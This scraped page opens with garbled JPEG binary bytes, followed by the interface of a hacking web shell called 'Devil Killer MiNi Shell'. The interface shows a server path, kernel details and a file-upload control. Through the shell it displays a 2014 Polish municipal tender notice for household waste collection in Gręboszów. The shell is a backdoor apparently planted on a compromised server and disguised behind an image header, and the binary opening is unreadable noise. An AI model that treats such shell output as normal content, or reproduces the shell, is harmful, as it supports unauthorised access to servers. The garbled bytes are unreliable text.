JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141007/211783-N-2014.html

<p class="kh_header"><b>Gręboszów: Odbiór i zagospodarowanie odpadów  komunalnych od właścicieli 
nieruchomości zamieszkałych na terenie gminy Gręboszów</b><br>
<b>Numer ogłoszenia: 211783 - 2014; data zamieszczenia: 07.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.greboszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów  komunalnych od właścicieli 
nieruchomości zamieszkałych na terenie gminy Gręboszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest :  Odbiór i zagospodarowanie odpadów  komunalnych od właścicieli 
nieruchomości zamieszkałych na terenie gminy Gręboszów.
2.	Wspólny słownik zamówień (CPV):
       90511000 - 2  Usługi wywozu odpadów
       90512000 - 9  Usługi  transportu odpadów
       90513100 - 7  Usługi wywozu odpadów pochodzących z gospodarstw domowych
       90533000 - 2  Usługi zagospodarowania odpadów

  3.  Zakres zamówienia:
       Szacunkowa masa odpadów komunalnych, które mogą zostać odebrane i zagospodarowane 
       w czasie trwania zamówienia wynosi  około 500 Mg, w tym: 
       200 Mg - niesegregowane (zmieszane) odpady komunalne,
       300 Mg - segregowane odpady komunalne.

  4.  Zakres zamówienia obejmuje w szczególności odbiór i zagospodarowanie:   
      1)  niesegregowane odpady komunalne (odpady zmieszane) kod 200301  
  2)  selektywne odpady komunalne (odpady segregowane) 150101, 150102, 150105, 150107, 
      200101, 200102, 200139, 200140
      3)  odpady ulegające biodegradacji (kod 200201, 200202, 200203)
 4)   odpady wielkogabarytowe (kod 20 03 07), zużyty sprzęt elektryczny i elektroniczny (kod 
      200123, 200135, 200136, 160103, 200110, 200111), zużyte baterie  i akumulatory (kod 
      200133, 200134), zużyte opony  (kod 160103), przeterminowane leki (kod 200131, 
      200132), odpady budowlane i rozbiórkowe (kod 170101, 170102, 170103,  170106, 
      170107, 170180, 17018, z zastrzeżeniem, jak podano w ust. 7, pkt  1 f)  
5. Urządzenia do gromadzenia odpadów: pojemniki, kontenery i worki, które zostaną ustawione 
     w miejscach gromadzenia odpadów wskazanych przez Zamawiającego, zapewnia Wykonawca.
     6.  Ogólna charakterystyka Gminy Gręboszów
           1)  powierzchnia gminy Gręboszów wynosi 48,63 km2
           2)  liczba mieszkańców zameldowanych na terenie gminy Gręboszów na dzień 30.06.2014 r. - 
                3481  osoby,
           3)  liczba mieszkańców Gminy - według danych z deklaracji - 2345 osób,
           4)  liczba mieszkańców według struktury zabudowy :
                 - liczba osób zamieszkała w zabudowie jednorodzinnej według danych z deklaracji - 2243
                 - liczba osób zamieszkała w zabudowie wielorodzinnej według danych z deklaracji - 102 
           3)  na terenie gminy Gręboszów jest:
                 -  nieruchomości jednorodzinnych  800, w których znajduje się 804 gospodarstwa domowe
                 -  nieruchomości wielorodzinnych 4, w których znajduje się 16 gospodarstw domowych.
          4)  Miejscowości na terenie gminy Gręboszów objęte przedmiotem zamówienia: Gręboszów, 
               Lubiczko, Bieniaszowice, Okręg, Ujście  Jezuickie, Biskupice, Zawierzbie, Karsy, Borusowa, 
               Kozłów, Hubenice, Wola Gręboszowska, Wola Żelichowska, Żelichów, Zapasternicze.
     7. Szczegółowy opis przedmiotu zamówienia
          Zgodnie z przepisami ustawy z dnia 13 września 1996 r. o utrzymaniu  czystości i porządku 
          w gminach (t.j. Dz. U. z 2013 r. poz. 1399) oraz zapisami Regulaminu utrzymania czystości
          i porządku   na terenie Gminy Gręboszów ( Uchwała Rady Gminy Gręboszów Nr XIX/131/2012 
          z dnia 28 grudnia  2012 r.) zakres prac obejmuje:
    1) odbieranie i zagospodarowanie od wszystkich właścicieli nieruchomości zamieszkałych na terenie 
         gminy Gręboszów  wszystkich rodzajów odpadów komunalnych, w tym selektywne odbieranie 
         odpadów:
    a) niesegregowanych (zmieszanych) odpadów komunalnych,
    b) odpadów segregowanych, w tym: tworzywa sztuczne, metale, papier i  tektura, szkło, w tym 
         szkło bezbarwne oraz kolorowe, opakowania wielomateriałowe, odpady zielone,
    c)  odbieranie odpadów ulegających biodegradacji, w tym odpadów opakowaniowych 
         ulegających  biodegradacji
    d) zużytego sprzętu elektrycznego i elektronicznego, zużytych  opon, przeterminowanych leków,
         zużytych baterii i akumulatorów,
    e) odpady wielkogabarytowe (meble, drzwi, okna, itp.), 
    f) odpady budowlane i rozbiórkowe,  na  wniosek posiadacza  nieruchomości -  za dodatkową 
        jego opłatą dla Wykonawcy.
         g) odbieranie i zagospodarowanie wszystkich rodzajów odpadów komunalnych z Punktu 
        Selektywnej Zbiórki Odpadów Komunalnych utworzonego na terenie gminy Gręboszów.
      2)  Wykonawca zobowiązany jest do dostarczenia i ustawienia na terenie nieruchomości,
            bez dodatkowej opłaty od właściciela nieruchomości,  pojemnika  na odpady mieszane 
            i dostarczenie worków na odpady zbierane selektywnie.
3)   Liczba poszczególnych rodzajów pojemników  wynosi:
       a) 120 litrów                    -    685  szt.  - dla gospodarstw segregujących odpady
       b) 240 litrów                    -      95  szt.  -  dla gospodarstw nie segregujących odpady
      Razem pojemników    -    780* szt. ( *  Ilość nieruchomości szacunkowa. Zamawiający zastrzega 
 sobie zmianę ilości nieruchomości,  z których będą odbierane odpady komunalne w okresie 
 realizacji zamówienia, w zależności od deklaracji, jakie zostaną złożone przez właścicieli  
 nieruchomości zamieszkałych).
4)  Wykonawca zobowiązany będzie dostarczyć i ustawić w wyznaczonych miejscach przez
      Zamawiającego pojemniki do selektywnego zbierania przeterminowanych leków - 2 szt.
     5)  Zamawiający zastrzega sobie prawo zmiany ilości   pojemników na odpady. Ich ilość  w ciągu 
           okresu realizacji zamówienia może ulegać  zmianie w stosunku do ilości wykazanej w ust.7 pkt 3.  
           Przy czym  zaoferowany przez Wykonawcę sposób wynagrodzenia  nie  będzie ulegać zmianie.
     6)  Za utrzymywanie pojemników w odpowiednim stanie  sanitarnych, porządkowym i technicznym
          odpowiada Wykonawca. Dezynfekcja pojemników przez wykonawcę musi być wykonywana 
          co najmniej 2 razy do roku. 
     7)  W trakcie realizacji umowy Wykonawca zobowiązany będzie do wyposażenia nieruchomości 
           w odpowiednie pojemniki zgodnie ze zgłoszeniem Zamawiającego. Dostarczenie i ustawienie 
           pojemników na terenie wskazanych nieruchomości  nastąpi w ciągu 7 dni roboczych od dnia 
           zgłoszenia przez Zamawiającego. Dotyczy to sytuacji zmiany ilości pojemników, zmiany 
           pojemności pojemników na danej nieruchomości, bądź nowych nieruchomości, jeżeli pojawią 
           się w trakcie realizacji zamówienia. 
      8)  Wykonawca otrzyma od Zamawiającego szczegółowy wykaz właścicieli nieruchomości, z których 
          odbierane będą odpady komunalne.
     9)  Wymaga się również odbieranie odpadów z pojemników innych niż wyżej określono lub też 
           zgromadzonych przy pojemniku, a wystawionych przez mieszkańca nieruchomości.
   10)  Jeśli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia z winy Wykonawcy 
           pojemników, Wykonawca w trakcie realizacji zamówienia jest zobowiązany do dodatkowego 
           dostarczenia pojemników.
   11)  Za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów 
          odpowiedzialność ponosi Wykonawca.
   12) Wykonawca zobowiązany jest w ramach umowy do przygotowania  harmonogramu odbioru 
          odpadów oraz jego dystrybucji wśród właścicieli nieruchomości. Wykonawca zobowiązany jest 
          również do dystrybucji wśród właścicieli innych dokumentów związanych z  Systemem 
          Gospodarki Odpadami o ile nie będą one wymagały potwierdzenia odbioru.
   13) Wykonawca zobowiązany jest do świadczenia usług dodatkowych w zakresie odbioru odpadów. 
          Usługi dodatkowe to odbiór na wniosek właściciela z terenu nieruchomości odpadów budowlanych 
          i rozbiórkowych - poza ustalonym harmonogramem odbioru. Za wywóz tych odpadów zapłaci 
          właściciel nieruchomości z której odbierane będą odpady. Cena ofertowa nie obejmuje świadczenia 
          usług dodatkowych.
  14)  Szacunkowa masa odpadów komunalnych, które mogą zostać odebrane i zagospodarowane 
          w czasie trwania zamówienia wynosi  około 500 Mg, w tym: 
          200 Mg - niesegregowane (zmieszane) odpady komunalne,
          300 Mg - segregowane odpady komunalne.
          Ilość odpadów komunalnych  może ulec zmianie w okresie  realizacji zamówienia,  w zależności 
          od deklaracji, jakie zostaną złożone przez właścicieli nieruchomości zamieszkałych.
          Wynagrodzenie za wykonanie przedmiotu umowy będzie stanowić iloczyn faktycznie odebranych
          i dostarczonych odpadów do  instalacji  przy zastosowaniu cen jednostkowych podanych
          w formularzu ofertowym  
8. Wymagania dotyczące odbierania odpadów:
Na terenie gminy Gręboszów obowiązywać będzie system zbiórki odpadów komunalnych pojemnikowy dla odpadów zmieszanych oraz  system workowy dla odpadów segregowanych.
Każde gospodarstwo domowe musi być wyposażone w pojemnik na odpady komunalne. Pojemniki stanowią własność Wykonawcy i po realizacji zamówienia są do jego dyspozycji.
 1) niesegregowane odpady komunalne (odpady zmieszane) kod 200301  - gromadzone będą 
     w pojemnikach  120 ÷240 litrów  znajdujących się przy posesjach.
     Wykonawca odbiera od właścicieli nieruchomości zamieszkałych każdą ilość niesegregowanych 
     (zmieszanych) odpadów komunalnych: 
    a)  częstotliwość wywozu  1 raz  w miesiącu, według harmonogramu  przedstawionego przez 
         Wykonawcę  i uzgodnionego z Zamawiającym,
b)  realizacja reklamacji (nieodebrane z nieruchomości odpady zgodnie z harmonogramem) - 
      w przeciągu 2 dni od otrzymania zawiadomienia fax lub e-mail od Zamawiającego. 
                Załatwienie reklamacji należy niezwłocznie potwierdzić - faksem  nr 14 641 60 53  lub e-mail:
                ug_greboszow1@wp.pl,
           c)  Wykonawca zobowiązuje się do zagospodarowania całej masy odebranych niesegregowanych   
                (zmieszanych) odpadów zgodnie z przepisami obowiązującego prawa oraz przedstawienia 
                Zamawiającemu  1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności 
                (tj.  karty przekazania odpadów). 
 d)  pojemniki do odbioru niesegregowanych odpadów  komunalnych zapewnia Wykonawca.

2) selektywne odpady komunalne (odpady segregowane) 150101, 150102, 150105, 150107, 
    200101, 200102, 200139, 200140
    Selektywna zbiórka odpadów będzie  odbywała się w systemie workowym..
 a)   pojemność worków - 120 litrów z folii LDPE o grubości zapewniającej wytrzymałość,
 b)   wprowadza się następujące rodzaje worków o kolorystyce  i napisach:
           1) kolor żółty z napisem TWORZYWA SZTUCZNE - na odpady z tworzyw sztucznych,
           2) kolor biały z napisem PAPIER - na odpady  z papieru i tektury,
           3) kolor zielony z napisem SZKŁO - na odpady  ze szkła,
           4) kolor niebieski z napisem METALE  - na odpady metalowe,
           5) kolor brązowy z napisem ODPADY BIODEGRADALNE I ZIELONE - na odpady 
               biodegradalne i zielone.
           Dopuszczalny jest inny sposób oznakowania pojemników, worków  zgodnie z podmiotem 
           uprawnionym w zakresie gospodarki odpadami.


     c)  częstotliwość wywozu  1 raz w miesiącu, według harmonogramu  
          przedstawionego przez Wykonawcę  i uzgodnionego z Zamawiającym.
     d)  worki do selektywnej zbiórki odpadów  (dla mieszkańców przystępujących do segregacji, 
          na wymianę, w ramach reklamacji) zapewnia Wykonawca. Po podpisaniu umowy, przed 
          pierwszym odbiorem odpadów Wykonawca winien dostarczyć właścicielowi każdej 
          nieruchomości po co najmniej 2 worki każdego koloru. Kolejne worki dostarczane będą 
          w systemie:  za każdy odebrany z selektywnymi odpadami worek Wykonawca pozostawia 
          na  posesji worek pusty. Worki dodatkowe  Wykonawca przekaże do dyspozycji Gminy, które 
          będą wydawane mieszkańcom w razie potrzeb
     e)  worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone. Dodatkowo
          na worku muszą widnieć adres i dane kontaktowe Wykonawcy,
     f)  Wykonawca zobowiązuje się do: 
   - uzupełnienia na własny koszt właścicielom nieruchomości worków do selektywnego zbierania 
     odpadów komunalnych po każdorazowym  odbiorze, poprzez pozostawienie przy wejściu na  
     nieruchomość nowych pustych worków w dniu odbioru selektywnie zebranych odpadów, 
     w ilości  odpowiadającej liczbie odebranych worków,
           -  zagospodarowania całej masy selektywnie zebranych odpadów poprzez przekazanie ich 
              do odzysku zgodnie z przepisami obowiązującego prawa oraz przedstawienie 
              Zamawiającemu 1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności
              (tj, karty przekazania odpadów),

3)  odpady ulegające biodegradacji (kod 200201, 200202, 200203) - odbiór odbywał się będzie 
      w systemie workowym,  worki w kolorze brązowym,
a)   częstotliwość wywozu: - 1 raz w miesiącu według  harmonogramu  przedstawionego przez 
      Wykonawcę i uzgodnionego z Zamawiającym,
   b)  worki do odbioru odpadów ulegających biodegradacji  (dla mieszkańców przystępujących 
         do zbiórki, na wymianę oraz w ramach reklamacji) zapewnia Wykonawca,
c)  Wykonawca zobowiązuje się do: 
      -  uzupełnienia na własny koszt właścicielom nieruchomości worków do zbierania odpadów  
         ulegających biodegradacji po każdorazowym odbiorze, poprzez pozostawienie na 
         nieruchomości nowych pustych worków w dniu odbioru, w ilości odpowiadającej liczbie 
         odebranych worków,
     -  zagospodarowania całej masy odebranych odpadów ulegających biodegradacji poprzez 
         przekazanie ich do odzysku zgodnie z przepisami prawa oraz przedstawienie 
         Zamawiającemu 1 raz w miesiącu dowodów potwierdzających wykonanie tych czynności 
         ( tj. karty przekazania odpadów).

4)   odpady wielkogabarytowe (kod 20 03 07), zużyty sprzęt elektryczny i elektroniczny(kod 
      200123, 200135, 200136, 160103, 200110, 200111), zużyte baterie  i akumulatory (kod 
      200133, 200134), odpady budowlane i rozbiórkowe (kod 170101, 170102, 170103,  170106, 
      170107, 170180, 170182)  zużyte opony  (kod 160103), przeterminowane leki (kod 200131, 
      200132)
      Odbieranie i wywóz odpadów wielkogabarytowych, zużyty sprzęt elektryczny i elektroniczny, 
      zużyte opony odbywać się będzie bezpośrednio sprzed  posesji właścicieli  nieruchomości, 
      oraz w wyznaczonych miejscach przez Zamawiającego na terenie gminy Gręboszów,  
      a)   częstotliwość odbioru  2 razy w roku  - według harmonogramu  
            przedstawionego  przez Wykonawcę  i uzgodnionego z Zamawiającym.
  b)  Wykonawca zobowiązuje się do zagospodarowania całej masy odpadów wielkogabarytowych, 
    zużytego sprzętu elektrycznego i elektronicznego, zużytych baterii i akumulatorów, odpadów 
    budowlanych i rozbiórkowych poprzez przekazanie ich do odzysku zgodnie z przepisami 
    obowiązującego prawa oraz przedstawienie Zamawiającemu  po przeprowadzonej zbiórce 
    dowodów potwierdzających wykonanie tych czynności ( tj. karty przekazania odpadów).
 c)   przeterminowane leki - w wyznaczonych miejscach przez Zamawiającego na terenie gminy 
     Gręboszów - 1 raz na kwartał według  harmonogramu  przedstawionego przez 
     Wykonawcę i uzgodnionego z Zamawiającym,.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień  uzupełniających do wysokości 50 % 
           zamówienia podstawowego (art. 67 ust.1 pkt 6 ustawy Pzp.)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 3 000 zł, słownie:  trzy tysiące  00/100   złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykaże, że posiada: 
1) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych 
     od właścicieli nieruchomości, obejmujące  gminę Gręboszów (w przypadku wspólnego 
     ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą 
     być złożone przedmiotowe dokumenty dla każdego z nich).
          2)  zezwolenie na transport na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. 
                z 2013 r. poz. 21). W przypadku gdy Wykonawca jest zwolniony z obowiązku posiadania 
                zezwolenia na transport, przedkłada zezwolenie na odzysk i unieszkodliwianie odpadów.
          3)  wpis do rejestru prowadzonego przez Głównego Inspektora Ochrony Środowiska w zakresie 
                zbierania zużytego sprzętu elektrycznego i elektronicznego zgodnie z ustawą o zużytym 
                sprzęcie elektrycznym  i elektronicznym z dnia 29 lipca 2005 r. (t.j. Dz.U. z 2013 r. poz. 1155 
                ze zm.) lub zawarł umowę z podmiotem spełniającym wymogi Ustawy.
          4)  złoży oświadczenie z art. 22 ust.1 ustawy Pzp na załączonym druku - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dotyczący posiadania wiedzy i doświadczenia, 
          jeżeli  przedstawi wykaz wykonanych  a w przypadku świadczeń okresowych lub ciągłych 
          również  wykonywanych, głównych usług w zakresie niezbędnym do wykazania spełnienia 
          warunku wiedzy  i doświadczenia w okresie trzech lat przed upływem terminu składania ofert, 
          a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
   1) jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, polegającej na 
       odbiorze od właścicieli nieruchomości co najmniej 300 Mg odpadów w ciągu roku
       (z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały 
       wykonane), 
2) udowodni, że usługi zostały wykonane lub są wykonywane należycie (w przypadku wspólnego 
 ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców o udzielenie 
 niniejszego zamówienia, oceniane będzie ich łączne doświadczenie). 
Należy złożyć wykaz usług według propozycji formularza  - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku dotyczącego dysponowania odpowiednim potencjałem 
              technicznym, Zamawiający żąda:  przedłożenia wykazu  narzędzi, wyposażenia zakładu
               i urządzeń  technicznych dostępnych  Wykonawcy usług, w celu realizacji zamówienia wraz
              z informacją o podstawie dysponowania tymi zasobami sporządzonego wg propozycji 
             formularza  stanowiącego; potencjał techniczny -  załącznik nr 6 do niniejszej SIWZ; 
              Warunek zostanie spełniony, jeśli Wykonawca dysponuje sprzętem specjalistycznym do odbioru 
               i transportu odpadów komunalnych tj. :
               a) co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów  
                   komunalnych,
               b) co najmniej dwoma pojazdami przystosowanymi do  odbierania selektywnie zebranych 
                   odpadów komunalnych, 
               c) co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktujacej (tj. 
                   samochodem  o ładowności co najmniej  2,5 tony  umożliwiającym odbiór odpadów 
                   komunalnych  z trudno  dostępnych  terenów).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania  warunku dotyczącego dysponowania osobami zdolnymi do wykonania 
                zamówienia, Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków.
                Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie 
                oświadczenia o spełnianiu warunków udziału w postępowaniu. Należy złożyć oświadczenie
                 z art. 22 ust.1 ustawy Pzp na załączonym druku - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie.
          Zamawiający dokona oceny spełniania warunku udziału w postępowaniu na podstawie 
          oświadczenia o spełnianiu warunków udziału w postępowaniu. Należy złożyć oświadczenie
          z art. 22 ust.1 ustawy Pzp na załączonym druku - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca wskaże wykonanie jednej usługi odpowiadającej swoim rodzajem przedmiotowi zamówienia, polegająca na  odbiorze od właścicieli nieruchomości co najmniej 300 Mg odpadów w ciągu roku  (z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane). 
Wykonawca udowodni, że usługi zostały wykonane lub są wykonywane należycie (w przypadku wspólnego 
